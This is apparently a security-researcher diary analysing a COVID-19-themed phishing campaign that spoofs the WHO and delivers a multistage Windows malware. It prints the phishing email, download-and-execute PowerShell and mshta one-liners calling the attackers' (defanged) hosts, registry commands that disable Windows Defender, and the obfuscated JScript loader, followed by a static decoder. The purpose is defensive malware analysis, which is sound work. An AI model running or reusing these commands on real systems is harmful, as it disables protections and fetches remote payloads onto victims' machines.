COVID-19 Themed Multistage Malware
More and more countries are closing their borders and asking citizens to stay at home. The COVID-19 virus is everywhere and is also used as a lure in campaigns targeting people who are looking for information about the pandemic. I found a malicious email that delivers a multi-stage malware.
It spoofs a World Health Organisation email and pretends to provide recommendations to the victim:
From: World Health Organisation <info@who.org>
To: xxx
Subject: CORONAVIRUS TRAVEL RECOMMENDATIONS

Dear Sir / Madam,

Following the vertiginous spread of the CORONAVIRUS epidemic, which has already left more than 4,200 people dead and 119,000 cases worldwide; we recommend these sanitary measures.

Download these measures [1]

Kind Regards,

WORLD HEALTH ORGANIZATION
Avenue Appia 20
1202 Geneva
Swiss
Phone: + 41-22-7912111

Links:
------
[1] hxxp://bit[.]ly/2W1eAvU
The shortened link redirects to a URL that serves a malicious Word document:
hxxp://216[.]189[.]145[.]11/RECOMMENDATIONS CORONAVIRUS.doc
(This IP is located in the US, at a hosting company.)
The downloaded document (SHA256:c3379e83cd3e8763f80010176905f147fcc126b5e7ad9faa585d5520386bd659) has a current VT score of 6/60[1]! The document does not have any macro but has two embedded objects:
root@remnux:/malwarezoo# oledump.py "RECOMMENDATIONS CORONAVIRUS.doc"
  1:       114 '\x01CompObj'
  2:       280 '\x05DocumentSummaryInformation'
  3:       416 '\x05SummaryInformation'
  4:      7340 '1Table'
  5:      5304 'Data'
  6: O   26260 'ObjectPool/_1645425484/\x01Ole10Native'
  7:         6 'ObjectPool/_1645425484/\x03ObjInfo'
  8: O   26359 'ObjectPool/_1645425485/\x01Ole10Native'
  9:         6 'ObjectPool/_1645425485/\x03ObjInfo'
 10:      4096 'WordDocument'
The two embedded objects are identical: a DOS batch file (SHA256:c8aace2ca96c6e308f374f4b2e425849ca94287aa8ea9768c5a24b38a2167d24), unknown on VT.
When you look at the file, it is heavily obfuscated using Chinese characters:
This script is a downloader and grabs another script via PowerShell:
powershell -WindowStyle Hidden -command "IEX (New-Object Net.WebClient).DownloadFile('hxxp://216[.]189[.]145[.]11/auto.cfg.bat', 'C:\Users\Public\Libraries\auto.cfg.bat');" C:\Users\Public\Libraries\auto.cfg.bat
The new script is obfuscated in the same way. Once launched, it performs the following actions:
It changes system registry keys to weaken system security (here, Windows Defender policies). Some examples:
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
The script is also a downloader and grabs another stage via PowerShell (the command is passed base64-encoded, in UTF-16LE, through -e):
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZABkAHAALgBuAGUAdAAvAHYAPwBnAHAAbAAxADkAMAA3ADIAMwAnACkA
The decoded PowerShell code is:
IEX (New-Object Net.WebClient).downloadstring('hxxp://v[.]bddp[.]net/v?gpl190723')
Unfortunately, this URL was not responding.
Another stage is downloaded. This time, it's a piece of JavaScript code processed via mshta.exe:
mshta hxxp://GoogleChromeUpdater[.]twilightparadox[.]com:448/html
Here is a beautified version of the code:
<script language="JScript">
window.moveTo(-1337, -2019);
window.blur();
window.resizeTo(2, 4);
try {
  window.onerror = function(sMsg, sUrl, sLine) { return false; }
  window.onfocus = function() { window.blur(); }
} catch (e) {}

function NOmOucjRaxBnHwMIf(gpkyaHkgGqh, iavlrtFGhy) {
  var SfYFsjixiguptptyv = '';
  while (iavlrtFGhy.length < gpkyaHkgGqh.length) {
    iavlrtFGhy += iavlrtFGhy;
  }
  for (i = 0+0-0; i < gpkyaHkgGqh.length; i += (2+0-0)) {
    var TcnMXxJMlPhQpMlksnDx = String.fromCharCode(parseInt(gpkyaHkgGqh.substr(i, 2+0-0), 16+0-0) ^ iavlrtFGhy.charCodeAt(i/(2+0-0)));
    SfYFsjixiguptptyv = SfYFsjixiguptptyv + TcnMXxJMlPhQpMlksnDx;
  }
  return SfYFsjixiguptptyv;
}

var gXbDAuFXjxYTM = "xGYBCFZPNUjKFwPBeiSAxSyettCzqjyFUJMjImpwDmpwlQqatTAgfCPGAQAFiCgaWUYREMMPMJYBkIygwmbEzDPpbAGbtlNPimLLk";
var ckTUCQboJKNoxRgH = "ksYuHEQKKuHjHjfFWUCuWQZzzMDMYSJGvrcgEPiLSRVwqPelhmAJInYhMWUJjBrSbFSbnFnFjlOhpPsOTWDPApkTlNxwipMPTVtxBJBtwmtUIElEWCHjKI";
var rZyJSgQdCyJzu = "CBgHEmtkzNEWPCDReDwdcjiSEQgFQiyfQWBaGtsSPZPMPYfqGBIBJbQrepPeewKgqWyEtkYeMJsRLCFRwFaZEYCtNOJkqvaQQ";
var sAshjBJYMdMIRSDamX = "sQKCisvUKaeuAFbpkganpjeYMdVCduknkLCKKeOhxzFyFejCVCqRcGRGdedcXrnPxJGnrcHviAlGBfbVJXUWArpEpkOFOuwkyxnjUzrCjKjQ";

var vYbxosMmhxPzmH = [
  String.fromCharCode(gXbDAuFXjxYTM.length),
  String.fromCharCode(ckTUCQboJKNoxRgH.length),
  String.fromCharCode(rZyJSgQdCyJzu.length),
  String.fromCharCode(sAshjBJYMdMIRSDamX.length)
];
var tNInITnWOtBTh = this[vYbxosMmhxPzmH[0+0-0] + vYbxosMmhxPzmH[1+0-0] + vYbxosMmhxPzmH[2+0-0] + vYbxosMmhxPzmH[3+0-0]];
tNInITnWOtBTh(NOmOucjRaxBnHwMIf('40093c4e363003611e0b3a6a3a166b154b531a3a2f3c 07741d1f267742150624752c1f373b320f04392307132d312207400d1621000e2b5a236e52600f203f1e420120094c2227553215094018373b2154022b0d1646670203123d6b251f1c37602c60202e34147d120429743e6f380b41480f0d1 [...Long string truncated...] 162c21390d1625753829001b45582d195e01220b4a20216e38341b1b457b6d3a622516272f2e176f1368377635010f3c63250c374a4d75445d20055d0f263f0158480a01350b3c52032f1d56032722461f6235080d16664f3634505a5162 d070a597e55494f27105d3d19554473120161073c054a4d67332c12247e341b1b246f3e0a402521176a0e14257e2e0b7e470d1a2b1a171620022a3b7a67381f0e277b221738264a09611e013e77350b102d18391c363b351c7d0700381b4 707f55623c03362b29046001025e74290b0537643d032c3b4c67022a', '6hNnbdN9WFp3lRVn'));
</script>
<hta:application caption="no" windowState="minimize" showInTaskBar="no" scroll="no" navigable="no" />
<!-- -->
The interesting part of the code is the way they obfuscate the 'eval' call:
var vYbxosMmhxPzmH=[String.fromCharCode(gXbDAuFXjxYTM.length), String.fromCharCode(ckTUCQboJKNoxRgH.length), String.fromCharCode(rZyJSgQdCyJzu.length), String.fromCharCode(sAshjBJYMdMIRSDamX.length) ];
They convert the length of each variable into a char:
String.fromCharCode(gXbDAuFXjxYTM.length) -> ‘e’
String.fromCharCode(ckTUCQboJKNoxRgH.length) -> ‘v’
...
In the function NOmOucjRaxBnHwMIf(), you can spot a '^' operator that manipulates strings and decrypts the XOR'd code: each pair of hex digits is XORed with one character of the key, and the key is doubled until it is long enough. SpiderMonkey is the perfect tool to decode the JavaScript:
root@remnux:/malwarezoo# js -f /usr/share/remnux/objects.js malicious.js
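As an added example (not code from the original diary), here is a clean re-implementation of the decoder and of the "length to character" trick, written so the second stage is returned for review instead of being handed to eval. Function names, the demo plaintext and the decoy strings are ours; the key value and the four lengths (101, 118, 97, 108) come from the sample above.

```javascript
// Added example, not the malware's own code: static decoding of the HTA stage.

// Mirror of NOmOucjRaxBnHwMIf(): hex bytes XORed with a key that is doubled
// until it covers the ciphertext. Non-hex characters are dropped first, because
// the copy in the diary is line-wrapped (assumption: whitespace is an artifact).
function xorHexDecode(hex, key) {
  const clean = hex.replace(/[^0-9a-fA-F]/g, "");
  let k = key;
  while (k.length < clean.length) k += k;      // same key stretching as the sample
  let out = "";
  for (let i = 0; i < clean.length; i += 2) {
    const byte = parseInt(clean.substr(i, 2), 16);
    out += String.fromCharCode(byte ^ k.charCodeAt(i / 2));
  }
  return out;
}

// Inverse of the above; used here only to build a constructed test input.
function xorHexEncode(text, key) {
  let k = key;
  while (k.length < text.length) k += k;
  let hex = "";
  for (let i = 0; i < text.length; i++) {
    hex += (text.charCodeAt(i) ^ k.charCodeAt(i)).toString(16).padStart(2, "0");
  }
  return hex;
}

// The eval trick: the function name is never written; each character is the
// length of a decoy string, so a grep for "eval" finds nothing.
function hiddenName(decoys) {
  return decoys.map((s) => String.fromCharCode(s.length)).join("");
}

// Static stand-in for `this[hiddenName(...)](payload)`: report what would be
// called and return the decoded payload instead of executing it.
function decodeStage(hexPayload, key, decoys) {
  return { resolvedCall: hiddenName(decoys), payload: xorHexDecode(hexPayload, key) };
}

// Constructed demo input (not the real second stage); key value is the sample's.
const DEMO_KEY = "6hNnbdN9WFp3lRVn";
const DEMO_PLAINTEXT = "var beacon = 'constructed sample only';";
const DEMO_HEX = xorHexEncode(DEMO_PLAINTEXT, DEMO_KEY);
const DEMO_DECOYS = ["x".repeat(101), "x".repeat(118), "x".repeat(97), "x".repeat(108)];

console.log(decodeStage(DEMO_HEX, DEMO_KEY, DEMO_DECOYS));
```

Applied to the first four bytes of the sample's hex string (40093c4e) with its key, xorHexDecode() yields "var ", a quick sanity check that routine and key are right before decoding the whole blob.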
The script is very nicely obfuscated but, based on a first analysis, it looks to be a bot performing POST requests at a regular interval... I'll publish my findings about this script in my next diary!
Here is a first finding: it exfiltrates data about the infected host:
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key